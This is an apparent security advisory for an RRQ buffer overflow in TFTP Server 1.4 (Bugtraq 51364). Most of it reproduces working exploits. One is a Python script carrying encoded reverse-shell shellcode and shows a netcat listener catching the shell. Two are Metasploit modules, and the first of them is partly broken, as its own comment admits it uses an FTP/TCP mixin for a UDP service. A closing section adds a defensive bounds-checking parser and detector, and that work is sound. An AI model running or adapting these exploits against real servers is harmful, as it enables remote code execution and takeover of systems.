Published: 2012-01-11
Updated: 2012-05-16

Affected systems:
sourceforge tftp-server 1.4

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51364

TFTP Server is a free multi-threaded TFTP server for PXE boot. TFTP Server 1.4 contains a buffer overflow in its implementation; an attacker can exploit it to execute arbitrary code in the affected application.

<*Source: b33f
*>

Test method:
--------------------------------------------------------------------------------
Warning: the following program (method) may be offensive in nature and is provided for security research and teaching only. Users bear the risk themselves!

b33f () provided the following test method:

http://www.securityfocus.com/data/vulnerabilities/exploits/51364.py
http://www.securityfocus.com/data/vulnerabilities/exploits/51364.rb
http://www.securityfocus.com/data/vulnerabilities/exploits/51364-2.rb

```python
#!/usr/bin/python
#---------------------------------------------------------------------------#
# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow)                               #
# OS: Windows XP PRO SP3                                                    #
# Author: b33f                                                              #
#---------------------------------------------------------------------------#
# Smashing the stack for fun and practise...                                #
#                                                                           #
# This tftp service have been pwned extensively:                            #
# (1) Muts ==> WRQ Overflow                                                 #
# http://www.exploit-db.com/exploits/5314/                                  #
# (2) Molotov ==> WRQ Overflow                                              #
# http://www.exploit-db.com/exploits/10542/                                 #
# (3) tixxDZ ==> ERROR Overflow                                             #
# http://www.exploit-db.com/exploits/5563/                                  #
#                                                                           #
# Vulnerable software:                                                      #
# http://www.exploit-db.com/application/5314/                               #
#---------------------------------------------------------------------------#
# After some simple fuzzing with spike I discovered that sending a Read     #
# Request (RRQ) packet can also trigger a buffer overflow...                #
#---------------------------------------------------------------------------#
# It might take up to 30 seconds for some reason but the shell does appear  #
# as expected....                                                           #
#                                                                           #
# root@bt:~# nc -lvp 9988                                                   #
# listening on [any] 9988 ...                                               #
# 192.168.111.128: inverse host lookup failed: Unknown server error         #
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072        #
# Microsoft Windows XP [Version 5.1.2600]                                   #
# (C) Copyright 1985-2001 Microsoft Corp.                                   #
#                                                                           #
# C:\Program Files\TFTPServer>                                              #
#---------------------------------------------------------------------------#

import socket
import sys

host = "192.168.111.128"
port = 69

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

#msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b "\x00"
#x86/shikata_ga_nai succeeded with size 341 (iteration=1)
shell = (
"\xbb\x3c\xef\xdb\xc5\xdb\xdd\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x4f\x31\x5a\x14\x83\xc2\x04\x03\x5a\x10\xde\x1a\x27\x2d\x97"
"\xe5\xd8\xae\xc7\x6c\x3d\x9f\xd5\x0b\x35\xb2\xe9\x58\x1b\x3f"
"\x82\x0d\x88\xb4\xe6\x99\xbf\x7d\x4c\xfc\x8e\x7e\x61\xc0\x5d"
"\xbc\xe0\xbc\x9f\x91\xc2\xfd\x6f\xe4\x03\x39\x8d\x07\x51\x92"
"\xd9\xba\x45\x97\x9c\x06\x64\x77\xab\x37\x1e\xf2\x6c\xc3\x94"
"\xfd\xbc\x7c\xa3\xb6\x24\xf6\xeb\x66\x54\xdb\xe8\x5b\x1f\x50"
"\xda\x28\x9e\xb0\x13\xd0\x90\xfc\xff\xef\x1c\xf1\xfe\x28\x9a"
"\xea\x75\x43\xd8\x97\x8d\x90\xa2\x43\x18\x05\x04\x07\xba\xed"
"\xb4\xc4\x5c\x65\xba\xa1\x2b\x21\xdf\x34\xf8\x59\xdb\xbd\xff"
"\x8d\x6d\x85\xdb\x09\x35\x5d\x42\x0b\x93\x30\x7b\x4b\x7b\xec"
"\xd9\x07\x6e\xf9\x5b\x4a\xe7\xce\x51\x75\xf7\x58\xe2\x06\xc5"
"\xc7\x58\x81\x65\x8f\x46\x56\x89\xba\x3e\xc8\x74\x45\x3e\xc0"
"\xb2\x11\x6e\x7a\x12\x1a\xe5\x7a\x9b\xcf\xa9\x2a\x33\xa0\x09"
"\x9b\xf3\x10\xe1\xf1\xfb\x4f\x11\xfa\xd1\xf9\x16\x6d\x1a\x51"
"\xf7\xea\xf2\xa0\x07\xd4\x06\x2c\xe1\x70\x17\x78\xba\xec\x8e"
"\x21\x30\x8c\x4f\xfc\xd0\x2d\xdd\x9b\x20\x3b\xfe\x33\x77\x6c"
"\x30\x4a\x1d\x80\x6b\xe4\x03\x59\xed\xcf\x87\x86\xce\xce\x06"
"\x4a\x6a\xf5\x18\x92\x73\xb1\x4c\x4a\x22\x6f\x3a\x2c\x9c\xc1"
"\x94\xe6\x73\x88\x70\x7e\xb8\x0b\x06\x7f\x95\xfd\xe6\xce\x40"
"\xb8\x19\xfe\x04\x4c\x62\xe2\xb4\xb3\xb9\xa6\xc5\xf9\xe3\x8f"
"\x4d\xa4\x76\x92\x13\x57\xad\xd1\x2d\xd4\x47\xaa\xc9\xc4\x22"
"\xaf\x96\x42\xdf\xdd\x87\x26\xdf\x72\xa7\x62")

#---------------------------------------------------------------------------#
# (1) Stage1: 0x00409605 TFTPServer.exe - PPR                               #
# => 3-byte overwrite using the mandatory protocol null-byte.               #
# (2) Stage2: jump back 5-bytes "\xEB\xF9" so we have room for a far jump.  #
# (3) Stage3: jump back 1490-bytes to the beginning of our buffer.          #
# (4) Stage4: reverse shell port 9988 - size 341                            #
#---------------------------------------------------------------------------#

stage4 = "\x90"*50 + shell
stage3 = "\xE9\x2E\xFA\xFF\xFF"
stage2 = "\xEB\xF9\x90\x90"
stage1 = "\x05\x96\x40"

filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1
mode = "netascii"

youlose = "\x00\x01" + filename + "\x00" + mode + "\x00"
s.sendto(youlose, (host, port))
```

```ruby
###
# Title : TFTP SERVER v1.4 (RRQ) Remote Root BOF Exploit (MSF)
# Author : KedAns-Dz
# platform : windows (Remote)
# Type : Remote r00t & Buffer Ov3rfl0w
# Tested on : winXP sp3 (en)
# $Id: tftp14rrq_bof.rb | 2012-01-15 | 00:01 | KedAns-Dz $
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  # Note: this module mixes in the FTP client (TCP; connect_login/send_cmd)
  # although the target speaks TFTP over UDP/69. The module further below
  # uses Msf::Exploit::Remote::Udp instead.
  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'TFTP SERVER v1.4 (RRQ) Remote Root BOF Exploit',
      'Description'    => %q{
        This module exploits a After some simple fuzzing with spike I discovered that sending a Read
        Request (RRQ) packet can also trigger a buffer overflow
      },
      'Author'         => [
        'KedAns-Dz <ked-h[at]hotmail.com>', # t0 MSF
      ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 0.1',
      'References'     =>
        [
          [ 'URL', 'http://1337day.com/exploits/17361' ],        # by b33f
          [ 'URL', 'http://www.exploit-db.com/exploits/10542' ], # by Molotov
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'BadChars' => "\x00\x0d",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'TFTP SERVER v1.4 (Windows XP-SP3 / netascii mod)',
            {
              'Ret'    => 0x00409605, # ppr (from TFTPServer.exe)
              'Offset' => 93,
              'Mode'   => 'netascii'
            }
          ],
        ],
      'DefaultTarget'  => 0))
  end

  def check
    connect
    disconnect
    if (banner =~ /TFTP SERVER v1.4/)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect_login
    print_status("Trying target #{target.name}...")

    buf = make_nops(target['Offset']) # Nop's
    buf << payload.encoded
    buf << "\x41" * 1487
    buf << "\xE9\x2E\xFA\xFF\xFF"    # jump back
    buf << "\xEB\xF9\x90\x90"        # jump back 5-bytes
    buf << [target.ret].pack('V')
    buf << make_nops(18)             # Padding

    dz = "\x00\x01"
    dz << buf
    dz << "\x00"
    dz << target['Mode']
    dz << "\x00"

    send_cmd(dz, false)
    handler
    disconnect
  end
end
```

```ruby
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'TFTP server 1.4 ST(RRQ) Buffer overflow',
      'Description'    => %q{
        This exploit creates buffer overflow by sending a Read Request (RRQ) packet can also trigger a buffer overflow...
      },
      'Author'         => 'JK and b33f',
      'Version'        => '',
      'References'     =>
        [
          ['URL', 'http://securtyresearch.in/'],
          ['URL', '']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'TFTP server v1.4 Windows XP SP3', { 'Ret' => 0x00409605 } ],
          [ 'TFTP server v1.4 Windows XP SP0', { 'Ret' => 0x00418000 } ]
        ],
      'Privileged'     => true,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 12 2012'))

    register_options([Opt::RPORT(69)], self.class)
  end

  def exploit
    connect_udp
    stage = "\x00\x01"
    stage << make_nops(50) + payload.encoded
    stage << rand_text_alpha(1487 - (payload.encoded.length + 50))
    stage << "\xE9\x2E\xFA\xFF\xFF"
    stage << "\xEB\xF9\x90\x90"
    stage << [target.ret].pack('V')
    stage << "\x00"
    stage << "netascii"
    stage << "\x00"
    #youlose = "\x00\x01" + filename + "\x00"
    udp_sock.put(stage)
    disconnect_udp
  end
end
```

Recommendation:
--------------------------------------------------------------------------------
Vendor patch: sourceforge
-----------
The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's home page for the latest version:
http://jocr.sourceforge.net/index.html
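With no vendor patch listed, the practical defence is in the server's request parser and on the wire. The following added example is not part of this advisory, of the exploits above or of the TFTP Server project: it shows the bounds check a TFTP request parser should apply to the RRQ/WRQ filename and mode fields (RFC 1350 layout) before copying them anywhere, and a small classifier that flags datagrams failing those checks, such as a 1499-byte filename of the length the Python exploit above builds. The 255-byte filename limit and the sample datagrams are constructed for the example; RFC 1350 itself sets no maximum, which is exactly why a server must choose one and enforce it.

```python
"""Bounds-checked TFTP request parsing plus a detector for oversized RRQ/WRQ
fields. Added example for this advisory; not code from the advisory, the
exploits above or the TFTP Server project."""
import struct

OPCODES = {1: "RRQ", 2: "WRQ"}
VALID_MODES = {"netascii", "octet", "mail"}
# Policy limits chosen for this example (an assumption; RFC 1350 sets none).
MAX_FILENAME = 255
MAX_MODE = 8  # longest RFC 1350 mode string is "netascii"


class MalformedRequest(ValueError):
    """Raised for any request that fails a structural or length check."""


def parse_request(datagram, max_filename=MAX_FILENAME):
    """Parse a TFTP RRQ/WRQ datagram.

    Layout (RFC 1350): | opcode (2 bytes) | filename | 0 | mode | 0 |
    Every field is length-checked before it is used, which is the check a
    server that copies the filename into a fixed-size buffer must not skip.
    """
    if len(datagram) < 4:
        raise MalformedRequest("datagram too short for a request")
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in OPCODES:
        raise MalformedRequest("opcode %d is not a read/write request" % opcode)
    # Split on at most two NULs: filename, mode, and any RFC 2347 option bytes.
    fields = datagram[2:].split(b"\x00", 2)
    if len(fields) < 3:
        raise MalformedRequest("filename or mode is missing its NUL terminator")
    filename_raw, mode_raw, options = fields
    if not filename_raw:
        raise MalformedRequest("empty filename")
    if len(filename_raw) > max_filename:
        raise MalformedRequest("filename of %d bytes exceeds limit of %d"
                               % (len(filename_raw), max_filename))
    if len(mode_raw) > MAX_MODE:
        raise MalformedRequest("mode field of %d bytes is oversized" % len(mode_raw))
    mode = mode_raw.decode("ascii", "replace").lower()
    if mode not in VALID_MODES:
        raise MalformedRequest("unknown transfer mode %r" % mode)
    return {
        "opcode": OPCODES[opcode],
        "filename": filename_raw.decode("ascii", "replace"),
        "mode": mode,
        "has_options": bool(options),
    }


def inspect_datagram(datagram):
    """Classify one UDP/69 datagram for alerting; never raises."""
    try:
        parsed = parse_request(datagram)
    except MalformedRequest as exc:
        return {"verdict": "alert", "reason": str(exc), "length": len(datagram)}
    return {"verdict": "ok", **parsed}


def build_request(opcode, filename, mode):
    """Build a request datagram; used here only to construct sample traffic."""
    return struct.pack("!H", opcode) + filename + b"\x00" + mode + b"\x00"


# Constructed samples: a normal PXE boot read, a request whose filename is
# padded with 'A's to the length the exploit above uses (1487 + 5 + 4 + 3
# bytes), and a request with no terminators at all.
BENIGN_RRQ = build_request(1, b"pxelinux.0", b"octet")
OVERSIZED_RRQ = build_request(1, b"A" * 1499, b"netascii")
TRUNCATED = b"\x00\x01boot.bin"

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN_RRQ),
                      ("oversized", OVERSIZED_RRQ),
                      ("truncated", TRUNCATED)):
        print(name, inspect_datagram(pkt))
```

The same `parse_request` check belongs at the top of a TFTP server's request handler; `inspect_datagram` is the shape of a passive check, fed from a UDP/69 capture, that would have fired on this exploit's request without knowing anything about its payload.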